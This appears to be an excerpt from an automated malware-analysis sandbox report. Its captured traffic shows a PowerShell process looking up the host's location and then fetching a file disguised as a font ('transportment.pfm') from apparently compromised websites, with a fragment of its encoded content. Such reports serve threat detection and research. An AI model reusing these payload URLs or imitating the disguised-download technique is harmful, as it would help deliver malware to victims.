                                                        cache-control: public, max-age=300
                                                        access-control-allow-origin: *
                                                        Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                                                        Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                        HTTPS Proxied Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        0192.168.2.54971193.113.54.564437244C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-27 11:31:14 UTC189OUTGET /os/transportment.pfm HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                        Host: asociatiatraditiimaria.ro
                                                        Connection: Keep-Alive
                                                        2024-07-27 11:31:17 UTC518INHTTP/1.1 404 Not Found
                                                        Connection: close
                                                        expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                        cache-control: no-cache, must-revalidate, max-age=0
                                                        content-type: text/html; charset=UTF-8
                                                        link: <https://asociatiatraditiimaria.ro/wp-json/>; rel="https://api.w.org/"
                                                        transfer-encoding: chunked
                                                        date: Sat, 27 Jul 2024 11:31:16 GMT
                                                        server: LiteSpeed
                                                        alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                        2024-07-27 11:31:17 UTC850INData Raw: 31 30 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0d 0a 09 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 41 73 6f 63 69 61 c8 9b 69 61 20 54 72 61 64 69 c8 9b 69 69
                                                        Data Ascii: 10000<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <title>Page not found &#8211; Asociaia Tradiii
                                                        2024-07-27 11:31:17 UTC14994INData Raw: 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 73 6f 63 69 61 74 69 61 74 72 61 64 69 74 69 69 6d 61 72 69 61 2e 72 6f 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 36 2e 31 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54
                                                        Data Ascii: /core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/asociatiatraditiimaria.ro\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.6.1"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportT
                                                        2024-07-27 11:31:17 UTC16384INData Raw: 6c 6f 63 6b 2d 62 75 74 74 6f 6e 2e 69 73 2d 73 74 79 6c 65 2d 6f 75 74 6c 69 6e 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 3a 68 6f 76 65 72 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 73 20 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 2e 69 73 2d 73 74 79 6c 65 2d 6f 75 74 6c 69 6e 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 73 20 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 2e 69 73 2d 73 74 79 6c 65 2d 6f 75 74 6c 69 6e 65 20 3e 20 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 3a 6e 6f 74 28 2e 68 61 73 2d 74 65 78 74 2d 63 6f 6c 6f 72 29 3a 68 6f 76 65 72 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75
                                                        Data Ascii: lock-button.is-style-outline .wp-block-button__link:hover,.wp-block-buttons .wp-block-button.is-style-outline .wp-block-button__link:focus,.wp-block-buttons .wp-block-button.is-style-outline > .wp-block-button__link:not(.has-text-color):hover,.wp-block-bu
                                                        2024-07-27 11:31:17 UTC16384INData Raw: 74 68 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 63 75 73 74 6f 6d 2d 2d 61 73 74 2d 77 69 64 65 2d 77 69 64 74 68 2d 73 69 7a 65 29 3b 7d 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 5b 61 73 74 2d 62 6c 6f 63 6b 73 2d 6c 61 79 6f 75 74 5d 20 2e 61 6c 69 67 6e 66 75 6c 6c 20 7b 6d 61 78 2d 77 69 64 74 68 3a 20 6e 6f 6e 65 3b 7d 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 20 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 3b 7d 62 6c 6f 63 6b 71 75 6f 74 65 20 7b 6d 61 72 67 69 6e 3a 20 31 2e 35 65 6d 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 30 35 29 3b 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 3a 6e 6f 74 28 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 72 69
                                                        Data Ascii: th: var(--wp--custom--ast-wide-width-size);}.entry-content[ast-blocks-layout] .alignfull {max-width: none;}.entry-content .wp-block-columns {margin-bottom: 0;}blockquote {margin: 1.5em;border-color: rgba(0,0,0,0.05);}.wp-block-quote:not(.has-text-align-ri
                                                        2024-07-27 11:31:17 UTC16384INData Raw: 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 73 69 74 65 2d 63 6f 6e 74 65 6e 74 2c 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 61 73 74 2d 61 72 63 68 69 76 65 2d 64 65 73 63 72 69 70 74 69 6f 6e 2c 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 63 6f 6d 6d 65 6e 74 73 2d 61 72 65 61 20 2e 63 6f 6d 6d 65 6e 74 2d 72 65 73 70 6f 6e 64 2c 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 63 6f 6d 6d 65 6e 74 73 2d 61 72 65 61 20 2e 61 73 74 2d 63 6f 6d 6d 65 6e 74 2d 6c 69 73 74 20 6c 69 2c 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 63 6f 6d 6d 65 6e 74 73 2d 61 72 65 61 20 2e 63 6f 6d 6d 65 6e 74 73 2d 74 69 74 6c 65 7b 62 61 63 6b 67 72 6f 75 6e 64
                                                        Data Ascii: -container .site-content,.ast-separate-container .ast-archive-description,.ast-separate-container .comments-area .comment-respond,.ast-separate-container .comments-area .ast-comment-list li,.ast-separate-container .comments-area .comments-title{background
                                                        2024-07-27 11:31:17 UTC16384INData Raw: 61 79 6f 75 74 2d 66 6c 6f 77 20 3e 20 2e 61 6c 69 67 6e 72 69 67 68 74 7b 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 32 65 6d 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 65 6e 64 3a 20 30 3b 7d 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 6f 77 20 3e 20 2e 61 6c 69 67 6e 63 65 6e 74 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 20 21 69 6d 70 6f 72 74 61 6e 74 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 69 73 2d 6c 61 79 6f 75 74 2d 63 6f 6e 73 74 72 61 69 6e 65 64 20 3e 20 2e 61 6c 69 67 6e 6c 65 66 74 7b 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 30 3b 6d 61 72 67 69 6e 2d 69
                                                        Data Ascii: ayout-flow > .alignright{float: right;margin-inline-start: 2em;margin-inline-end: 0;}.is-layout-flow > .aligncenter{margin-left: auto !important;margin-right: auto !important;}.is-layout-constrained > .alignleft{float: left;margin-inline-start: 0;margin-i
                                                        2024-07-27 11:31:17 UTC16384INData Raw: 61 74 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 61 73 74 2d 67 72 69 64 2d 32 20 2e 61 73 74 2d 61 72 74 69 63 6c 65 2d 70 6f 73 74 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 70 6f 73 74 73 2c 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 61 73 74 2d 67 72 69 64 2d 33 20 2e 61 73 74 2d 61 72 74 69 63 6c 65 2d 70 6f 73 74 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 70 6f 73 74 73 2c 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 61 73 74 2d 67 72 69 64 2d 34 20 2e 61 73 74 2d 61 72 74 69 63 6c 65 2d 70 6f 73 74 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 70 6f 73 74 73 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 30 3b 7d 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 61 73 74 2d
                                                        Data Ascii: ate-container .ast-grid-2 .ast-article-post.ast-separate-posts,.ast-separate-container .ast-grid-3 .ast-article-post.ast-separate-posts,.ast-separate-container .ast-grid-4 .ast-article-post.ast-separate-posts{border-bottom:0;}.ast-separate-container .ast-


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.54971993.113.54.564437244C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-27 11:31:23 UTC71OUTGET /os/transportment.pfm HTTP/1.1
                                                        Host: asociatiatraditiimaria.ro
                                                        2024-07-27 11:31:24 UTC340INHTTP/1.1 404 Not Found
                                                        Connection: close
                                                        expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                        cache-control: no-cache, must-revalidate, max-age=0
                                                        content-type: text/html; charset=UTF-8
                                                        link: <https://asociatiatraditiimaria.ro/wp-json/>; rel="https://api.w.org/"
                                                        transfer-encoding: chunked
                                                        date: Sat, 27 Jul 2024 11:31:23 GMT
                                                        server: LiteSpeed
                                                        2024-07-27 11:31:24 UTC1028INData Raw: 31 30 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0d 0a 09 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 41 73 6f 63 69 61 c8 9b 69 61 20 54 72 61 64 69 c8 9b 69 69
                                                        Data Ascii: 10000<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <title>Page not found &#8211; Asociaia Tradiii
                                                        2024-07-27 11:31:24 UTC14994INData Raw: 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 7d 3b 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b
                                                        Data Ascii: auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);
                                                        2024-07-27 11:31:24 UTC16384INData Raw: 74 79 6c 65 2d 6f 75 74 6c 69 6e 65 20 3e 20 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 3a 6e 6f 74 28 2e 68 61 73 2d 74 65 78 74 2d 63 6f 6c 6f 72 29 3a 68 6f 76 65 72 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 73 20 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 2e 69 73 2d 73 74 79 6c 65 2d 6f 75 74 6c 69 6e 65 3a 6e 6f 74 28 2e 68 61 73 2d 74 65 78 74 2d 63 6f 6c 6f 72 29 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 35 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 30 29 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 76
                                                        Data Ascii: tyle-outline > .wp-block-button__link:not(.has-text-color):hover,.wp-block-buttons .wp-block-button.wp-block-button__link.is-style-outline:not(.has-text-color):hover{color:var(--ast-global-color-5);background-color:var(--ast-global-color-0);border-color:v
                                                        2024-07-27 11:31:24 UTC16384INData Raw: 20 31 2e 35 65 6d 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 30 35 29 3b 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 3a 6e 6f 74 28 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 72 69 67 68 74 29 3a 6e 6f 74 28 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 63 65 6e 74 65 72 29 20 7b 62 6f 72 64 65 72 2d 6c 65 66 74 3a 20 35 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 30 35 29 3b 7d 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 72 69 67 68 74 20 3e 20 62 6c 6f 63 6b 71 75 6f 74 65 2c 62 6c 6f 63 6b 71 75 6f 74 65 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 72 69 67 68 74 20 7b 62 6f 72 64 65 72 2d 72 69 67 68 74 3a 20 35 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c
                                                        Data Ascii: 1.5em;border-color: rgba(0,0,0,0.05);}.wp-block-quote:not(.has-text-align-right):not(.has-text-align-center) {border-left: 5px solid rgba(0,0,0,0.05);}.has-text-align-right > blockquote,blockquote.has-text-align-right {border-right: 5px solid rgba(0,0,0,
                                                        2024-07-27 11:31:24 UTC16384INData Raw: 65 6e 74 2d 6c 69 73 74 20 6c 69 2c 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 63 6f 6d 6d 65 6e 74 73 2d 61 72 65 61 20 2e 63 6f 6d 6d 65 6e 74 73 2d 74 69 74 6c 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 35 29 3b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 6e 6f 6e 65 3b 3b 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 39 32 31 70 78 29 7b 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 61 73 74 2d 61 72 74 69 63 6c 65 2d 73 69 6e 67 6c 65 3a 6e 6f 74 28 2e 61 73 74 2d 72 65 6c 61 74 65 64 2d 70 6f 73 74 29 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 63 6f
                                                        Data Ascii: ent-list li,.ast-separate-container .comments-area .comments-title{background-color:var(--ast-global-color-5);;background-image:none;;}@media (max-width:921px){.ast-separate-container .ast-article-single:not(.ast-related-post),.woocommerce.ast-separate-co
                                                        2024-07-27 11:31:24 UTC16384INData Raw: 73 2d 6c 61 79 6f 75 74 2d 63 6f 6e 73 74 72 61 69 6e 65 64 20 3e 20 2e 61 6c 69 67 6e 6c 65 66 74 7b 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 30 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 65 6e 64 3a 20 32 65 6d 3b 7d 2e 69 73 2d 6c 61 79 6f 75 74 2d 63 6f 6e 73 74 72 61 69 6e 65 64 20 3e 20 2e 61 6c 69 67 6e 72 69 67 68 74 7b 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 32 65 6d 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 65 6e 64 3a 20 30 3b 7d 2e 69 73 2d 6c 61 79 6f 75 74 2d 63 6f 6e 73 74 72 61 69 6e 65 64 20 3e 20 2e 61 6c 69 67 6e 63 65 6e 74 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 20 21 69 6d 70 6f 72 74 61 6e
                                                        Data Ascii: s-layout-constrained > .alignleft{float: left;margin-inline-start: 0;margin-inline-end: 2em;}.is-layout-constrained > .alignright{float: right;margin-inline-start: 2em;margin-inline-end: 0;}.is-layout-constrained > .aligncenter{margin-left: auto !importan


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.2.54972034.166.62.1904437244C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-27 11:31:30 UTC107OUTGET /wp-admin/oserve/transportment.pfm HTTP/1.1
                                                        Host: new.quranushaiqer.org.sa
                                                        Connection: Keep-Alive
                                                        2024-07-27 11:31:30 UTC396INHTTP/1.1 200 OK
                                                        Server: nginx/1.26.1
                                                        Date: Sat, 27 Jul 2024 11:31:30 GMT
                                                        Content-Type: application/x-font-type1
                                                        Content-Length: 519984
                                                        Connection: close
                                                        Last-Modified: Mon, 08 Jul 2024 02:08:54 GMT
                                                        ETag: "7ef30-61cb2e520d854"
                                                        Accept-Ranges: bytes
                                                        X-Cache: HIT from Backend
                                                        Strict-Transport-Security: max-age=31536000
                                                        X-XSS-Protection: 1; mode=block
                                                        X-Content-Type-Options: nosniff
                                                        2024-07-27 11:31:30 UTC15988INData Raw: 32 63 6e 59 77 75 74 45 2b 59 64 53 59 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 54 70 72 77 41 41 41 4e 6e 2f 68 38 6e 72 58 76 71 6a 4a 6b 32 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 55 66 4a 64 37 6b 6d 39 76 69 36 30 49 6e 4b 34 56
                                                        Data Ascii: 2cnYwutE+YdSYLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTprwAAANn/h8nrXvqjJk21tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbUfJd7km9vi60InK4V
                                                        2024-07-27 11:31:30 UTC16384INData Raw: 58 59 62 66 57 6d 54 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 74 6e 31 32 65 58 72 54 73 55 46 37 30 46 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 51 2b 42 74 41 41 41 41 4e 6a 4b 32 65 44 72 54 36 63
                                                        Data Ascii: XYbfWmT+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/tn12eXrTsUF70F1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dQ+BtAAAANjK2eDrT6c
